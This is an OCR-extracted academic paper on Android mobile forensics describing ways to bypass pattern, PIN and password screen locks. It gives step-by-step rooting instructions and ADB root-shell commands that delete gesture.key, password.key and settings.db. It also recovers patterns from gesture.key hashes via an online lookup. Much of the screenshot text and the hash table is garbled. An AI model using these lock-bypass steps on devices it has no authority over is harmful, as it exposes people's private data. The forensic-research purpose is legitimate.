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At the end of 2015, there were 4.7 billion noteworthy mobile subscribers 
globally, equivalent to 63% of the world’s population. Mobile phones had all 
the essential components or characteristics neatly fitted into a small space 
and designed to achieve high speeds, massive storage, and increased 
functionalities. Smart phones used to carry out imparting or exchanging of 
information such as calling, texting, Internet browsing, e-mail, photos, 
videos, and etc. Criminals can use smart phones for a number of activities. 


Namely, committing a fraud over e-mail, harassment via text messages, drug 
Analysis tools trafficking, child pornography, etc. In this research paper, We demonstrate, 
Mobile device analysis if a mobile phone is identified in a criminal activity and if it is locked by any 
Mobile forensics one of the locking mechanisms such as pattern lock, PIN lock and password 
Mobile phones lock, then how to unlock the mobile device without data loss for forensic 
examination. It is a great challenge for forensic experts to extract data from 
a mobile phone for forensic purpose that can be used as evidence in the court 
of law. The experimental results show that our approach can break all kinds 
of pattern locks. 


Smart phone 


Copyright © 2018 Institute of Advanced Engineering and Science. 
All rights reserved. 


Corresponding Author: 


G. Srinivas, 

Department of Information Technology, 

Anil Neerukonda Institute of Technology and Sciences, 
Visakhapatnam 530045, Andhra Pradesh, India. 

Email: gsrinivas.it@anits.edu.in 


1. INTRODUCTION 

Mobile phone forensics is the branch of digital forensics and it is the application of technological 
methods used to discover and examine the fact of mobile phone data. The Android operating system is 
currently the most widely used smart phone OS, with a market share of 85% as of the first quarter of 
2017 [1]. When the Android users increases, then the potential for evidence of crimes to be stored on 
Android devices also increases [2]. This gives a clear indication that the mobile phone forensics used for 
extracting and analyzing evidential data from Android mobile devices. If the mobile device is identified in a 
criminal activity and if it is locked then it is a difficult task for the mobile phone forensic investigator to 
unlock the mobile device and extract the data from it, because, Now a day, Mobile phone had different types 
of screen lock mechanisms, like swipe lock, PIN lock, pattern lock, fingerprint lock, etc. Pattern lock is 
widely used on Android devices to protect sensitive information. It is preferred by some users over PIN or 
text-based passwords, as psychology studies show that the human brain remembers and recalls visual 
information better than numbers and letters [3]. According to a recent study, 40% of the Android users use 
patterns to protect their devices instead of a PIN [4]. In this paper, we demonstrate how to unlock the mobile 
device without data loss for forensic examination by using various methodologies. The first step in the 
forensic exploration is to enter into the Mobile phone by unveil the locked screen by removing the PIN lock, 
it has been shown in Figure 3, removal of password lock has been shown in Figure 4, and without removal of 
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pattern lock how to unlock the mobile device has been shown in Figure 6, Figure 7 and Figure 8. 
The experimental results shows in the Table 1, indicates that an equivalent hash key value and gesture key 
value obtained for different pattern locks by an improvised methodologies described in this research paper. 


2. RESEARCH METHOD 

Having an established forensic environment prior to begin the examination, it is important as it 
determines that the data is protected. This paper covers the requirements that should be in place to start a 
forensic investigation of an Android mobile device. Android SDK furnish the tools that can be of great help 
during analysis and examination of the mobile phone. During forensic investigation, the SDK helps to 
connect to and address the data on the Android device. Now a day, the users can easily lock Android mobile 
phone by the usage of screen lock options. So that bypassing the mobile phone screen lock during 
investigation is crucial. Android mobile device offers different types of screen lock mechanisms, those are: 1. 
Pattern, 2. PIN, 3. Password, 4. Fingerprint, etc. There are several techniques to unbar an Android mobile 
phone: 1. Recovery Login, 2. Aroma File Manager, 3. Rooting and ADB, 4. Unbar the pattern lock without 
removing the pattern. 


2.1. Recovery login 

a. Enter the wrong lock screen five times, and then a pop up window will appear and be patient for some 
time as displayed the screen and make an attempt. 

b. If you have the backup PIN, then press the backup PIN option and enter the four digit PIN. Then Phone 
will be unlocked. 

c. If you are not having the backup PIN then select the forget password. Make sure the mobile data is 
enabled and then enter registered google mail id and password to that phone, and then phone will be 
unlocked. 

Drawback: If the mobile data or Wi-Fi is not enabled. Then this technique may not work. 


2.2. Aroma file manager 

a. “Copy the Aroma File manager ZIP file from the internet” [5]. 

b. After download, copy it into the mobile phone’s secure digital card, and insert the secure digital card into 
the mobile phone and lock it. 

c. Make sure the mobile phone is completely shut down. And clench the correct keys to boot the device into 
recovery process. For Samsung Galaxy Duos 2 GT-S7582 device, hold down the Volume Up button and 
Home button and Power button. 

d. Release the buttons when the device is powered on. Clench the buttons for some seconds. Now it is in the 
recovery mode. 

e. Clench the volume up and down keys to move up or down along with menu choices and select install ZIP 
from secure digital card. Now press the power button and confirm your selection. Now specify the 
location to install ‘aroma file manager’ from secure digital card. Subsequently open ‘aroma file manager’ 
again. 

f. Open the data folder and then system folder and observe the gesture or password file for pattern or 
passwords lock. Then remove whichever file and restart the mobile device. 

g. After reloaded the android operating system, if you identify that the password or pattern lock is not 
destroyed, then don’t panic, just produce whichever the pattern, then mobile phone will be open. 


2.3. Rooting and ADB 

Rooting means modify a Mobile phone device to remove restrictions imposed by the manufacturer 
or operator and allow installation of unauthorized software, remove unwanted bloat ware, enhance the 
operating system, replace the firmware, run the processor of the device at a speed higher than that intended 
(over clock) or modifying device circuit timing settings at a lesser clock rate as is specified (under clock) and 
customize anything and so on. Rooting around in Mobile phone core software might look like a set of 
instructions for preparing a particular dish. If any interruption happens while doing rooting then the Mobile 
phone become completely unable to function. It can also void the warranty. Routing introduces an 
unspecified amount of security risks. It could create security vulnerability and malware gain access of rooted 
status to steal data. 
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2.3.1. Construct a root 
First thing is to backup everything and determine that the device is fully charged prior to start. Turn 
on USB Debugging. To do that, open Settings on the device. If the Developer Options is not visible then go 
to the last portion of settings then, proceed the steps to start. 
a. Press on About Phone and observe the Build Number. 
Press on the build number seven times then developer option will appear on the screen. 
Press on the back key to observe the developer options. 
Press on developer option. 
Inspect to grant USB debugging. 


2.3.2. How to root Samsung Galaxy S Duos 2 GT-S7582 with iRoot. 

Step 1: Install Samsung USB Driver [6]. 

Step 2: Allow USB Debugging on Mobile phone. To allow USB debugging: open Settings and then 
Developer Options and then USB Debugging and then Check to enable. 

: Download and install iRoot application [7]. 

: once iRoot application is installed, then open it. 

: Once iRoot application is started then connect mobile phone to computer. 

: Press the root button to start rooting procedure. 

: The application automatically reboot the mobile phone. 

: It is rooted. 
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2.3.3. Android debugging bridge (ADB) 

The ADB is used to build a viaduct between computer and mobile phone. This can be used to unbar 
the device and to retrieve the data. This process will only toil if you have authorized USB debugging on 
Android mobile phone. 

a. Copy the Android SDK package [8] on your computer from internet. When once copied, then draw out 
the zip file on computer. 

b. Copy the pertinent USB drivers for mobile phone [5]. Obtain the USB drivers for mobile device from 
manufacturer’s website. 

c. Open the command prompt on computer and alter the directory to where the ADB file is situated. Type 
the following command in the command prompt. C:\android-sdk-windows\platform-tools 

d. Attach the mobile phone to computer by utilizing a USB cable and type the following command. 
C:\android-sdk-windows\platform-tools> adb devices —| 

If mobile phone is identified, then observe serial code (42038e42ca933100), phone model 
(GT-S7582), device product (Kernel: kyleprodsxx) in the command prompt message. Then list of devices 
attached to the computer will be shown in Figure 1. 


(C:\android-sdk-windows\platform-tools)adb devices -1 
List of devices attache 


142038e42ca933100 device product:kyleprodsxx model:GT_$7582 device: kyleprods 


C:\android-sdk-windows\platform-tools> 


Figure 1. Displays the list of attached devices 


Now enter the subsequent command to eliminate the pattern lock. 
C:\android-sdk-windows\platform-tools> adb shell 
shell@android:/$ su 
su (short for substitute user, super user, or switch user) is usually the straightforward and most appropriate to 
alter the possession of a login session to root. 


Figure 2 shows the login session as a root. 
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Å, 


C:\Windows\system32\cmd.exe - adb shell 


C:\android-sdk-windows\platform-tools>adb shell 
shell@android:/ $ su 


su 
root@android:/ # m 


Figure 2. Login Session as a root 


The pattern lock is a medium security mechanism. The drawn pattern is stored in gesture.key file. This file is 
available in /data/system directory. To remove it then type the following command. root@android:/ # rm 
/data/system/gesture.key 


Eä C:\Windows\system32\cmd.exe 


C:\android-sdk-windows\platform-tools>adb shell 
shell@android:/ $ su 

su 

root@android:/ # rm /data/system/gesture.key 

rm /data/system/gesture.key 

root@android:/ # reboot 

reboot 


C:Nandroid-sdk-windows\platform-tools> 


Figure 3. Removing the gesture.key 


After removing the gesture.key then restart the mobile device by using reboot command. After restarted the 
mobile device, still it shows draw pattern lock then don’t panic just draw any random pattern to unbar the 
device. If it is a password protected, to eliminate the password then use the following command: 
root@android:/ # rm /data/system/password.key 


—— 
CAWind stem32\cmd.« 
mA C:\Windows\system32\cmd.exe # l 


C:\android-sdk-windows\platform-tools>adb shell 
shell@android:/7 $ su 


su 
root@android:/ # rm /data/system/password.key 
rm /data/system/password. key 


root @android: 7 # reboot 
reboot 


C:\Nandroid-sdk-windows\platform-tools> 


Figure 4. Removing the password.key 


After removing the password.key then restart the mobile device by using reboot command. This time the 
mobile will directly starts without prompt any popup screen on the device. This method works when the 
device is rooted. If the above procedure is not worked properly then follow the instructions to remove the 
lock. 

1. Connect the mobile phone to the computer using the USB cable. 

2. Open the command prompt as said earlier and type the following commands 
C:\android-sdk-windows\platform-tools>adb.exe shell 

shell@android:/$ su 

root@android:/ # 

root@android:/ # cd /data/data/com.android.providers.settings/databases 

root@android:/ /data/data/com.android.providers.settings/databases # rm settings.db 
root@android:/ /data/data/com.android.providers.settings/databases # rm settings.db-shm 
root@android:/ /data/data/com.android.providers.settings/databases # rm settings.db-wal 
root@android:/ /data/data/com.android.providers.settings/databases # reboot 


So mono ss 
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Figure 5 shows the removing the settings to unlock the device. 


a 
E C:\Windows\system32\cmd.exe 


C:Nandroid-sdk-windows\platform-tools>adb shell 
shell@android:/ $ su 


5 > 


su 

root@android:/ # cd /data/data/com. android. providers .settings/databases 
cd /data/data/com. android.providers.sett ings/dat abases 

root@android: /data/data/com.android.providers.settings/databases # ls 


s .settings/databases rm settings .db 
root android: /data/data/con. android. providers .sett ings/databases rm settings.db-shm 
root@android:/data/data/com. android. providers .settings/databases # rm settings.db-wal 
rept android: /data/data/con.android. providers. settings databases reboot 


C:\android-sdk-windows\platform-tools>_ 


Figure 5. Removing the settings to unlock the device 


3. Now the Android mobile phone would be unlocked. 


2.4. Unbar the pattern lock without removing the pattern 

This method will work on the rooted mobile phone. In this method, first identify the gesture.key 
which is available at /data/system directory. To see the file, type the following command. 
C:\android-sdk-windows\platform-tools>adb shell 
shell @android:/ $ su 
su 
root@android:/ # cd /data/system 
cd /data/system 
root@android:/data/system # Is 

Afterwards, create a folder in the phone memory, all the files in phone memory are available at 
/storage/emulated/0. I have created a folder called check in phone memory. Now copy the gesture .key into 
the check folder as shown in below. 
root@android:/data/system # cp /data/system/gesture.key /storage/emulated/legacy/check/ 
root@android:/data/system # 


“gi Cllindoniyteaiendee-ab shel eI les 


C:\android-sdk-windows\platform-tools>adb shell 
shell@android:/ $ su 


su 

root@android:/ # cd /data/system 

cd /data/system 

root@android:/data/system # i /data/system/gesture. key i i i 


ey /storage/emulated/legacy/check/ 


root@android:/data/system # m 


Figure 6. Copy the gesture.key into phone memory 


When you are copying the gesture.key into the check folder, here you can observe the path, even 
though check folder is available at /storage/emulated/O in the phone memory, you should use legacy 
instead of 0 in the path. Now, copy the gesture.key from phone memory to computer. Download hexadecimal 
editor [9] from the internet. Open the file gesture.key in hexadecimal editor. 
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if) File Edit Search View Analysis Extras Window ? 
A-Ha Bite i6 [zl] ans zy) he fy 
| if) gesture.key 


Offset(h) 00 01 02 03 04 05 06 07 08 09 OA OB OC OD OE OF 


00000000 C8 CO B2 4A 15 DC 8B BF D4 11 42 79 73 57 46 95 BÀ J. Üc 26.BysWF* 
00000010 23 04 58 F0 #.X8 


Figure 7. Hexadecimal values of gesture.key 


Now, Copy the hexadecimal values alone into the notepad and remove the whitespace among the 
hexadecimal numbers. Now it looks like this: C8COB24A15DC8BBFD4114279735746952304580 
Afterwards, open the URL: https://barney.0x539.se/android/ copy the hexadecimal values into the text box 
and press Get gesture button. Now, entered hash value and gesture key will appear. If you want to see 


graphical image of the pattern then press Show pattern button. Now use this gesture key to remove the lock 
of the mobile device. 


Android hash to gesture 
Enter hash reported by the program 
CSCOB244 1SDCSBEFD411427973574695230458F¢ 


Gat gastuse 
Hash 
COCORQ4A 1SDCABBFD4 1142797 S57 962904 4F 0 
Gesture 


0 => 3J => 6=>7=->8 


OO 
OO 


Show pamtam 


Figure 8. Gesture value and Gesture pattern of Hash Value 


3. EXPERIMENTAL RESULTS 

In this section we present the results obtained by the experiments, the following table summarizes 
the test results on each test scenario conducted. The test results shows the hash key value and gesture key 
value of every pattern lock obtained by using an improvised methodologies described in this paper. The hash 
key value that can be retrieved from the gesture.key file which is located in /data/system directory of the 
mobile device. The hash value of every pattern that can be tested in the URL: 


https://barney.0x539.se/android/, and obtained the original pattern image. Experimental Results are shown in 
the Table 1. 
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Table 1. The Experimental Results of the Pattern, its Hash Value and its Gesture Value 


S.No Pattem lock of a Mobile Phone 


N 


~ 


10 


11 


13 


14 


15 


16 


18 


19 


Hash key value of pattem lock 


AS88A56833FF 606439250605 70552C01S4BASAB3SD 


SSS 7O0DSSBSATF37TBTIOF2IFCS24C 1846D96F AD0872 


FS6A6DFOA8S5FSB0EB 1E661B5836ED423542AFA86 


2334B 18710333 18B4FCA4SFOAAS4SC 1FFSBAACESEF 


23A6E7TC835CD7S5C3F17ECCSDICD7D&S40B 7409525 


2A1LSC27TOEBOB29DB51C83A1D2E83F065359D7D1D 


47B29DFFAFFB440432A06A97FC11EB4D33530EE4 


83F1C27066ECDF7S5EF81924DASAS9A ASSAESS2F3 


FE6AE2C2B76B4971829744BC22E9AS5EDB 1EB9D87 


310DA79611A19C5A3F96A1AG8FE33EC32834C364 


8965029F578413B95C6B35CFE25F73359CE4189D 


BBEBE2E286A6755150B76F23013C7F1057A806A0 


68CB3F4S6EBD&BCCFF419F66E8AB45B25F0FSFCFE 


1B1394BAA3D3 828F558C 1545 15SB4D03EAS3ATOC 


3FOBO2C 8E728DFB4ES6S02E9480523DF66F42B7AA 


FAESDFOS5B 1DF6088069D45C6C300F717BAES68EF 


OEFSSB4ATTICBCBEDBGA02A0DDSAS4525C35E2F2FF 


6836E6F 7003CC83B 10E465COESSF51692000C B53 


143175B8DSBESB4BCB 125D9EF 856DEC 1F5087B42 


F20A8DE7S883A1870A7TIBCA4SSC26BC2CFS6B7C140 


Gesture key value 


of lock 


0345876 


034125876 


6304258 


642103 


210345876 


036412587 


7301254 


87301254 


854367 


210367458 


412587630 


30147852 


14367852 


125478 


3452103678 


4587630 


387630124 


74321036 


03452476 
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4. CONCLUSION 

An appropriate setup is essential before conducting investigations on an Android mobile phone. If 
forensic acquisition needs the android device to be unlocked, then find out the best method to obtain access 
to the mobile phone. The diverse screen lock bypassing techniques discussed in this paper that help the 
examiner to bypass the pass code under different circumstances. Depending on the forensic acquisition 
method and scope of investigation, rooting the device should provide complete access to the files present on 
the mobile phone. 
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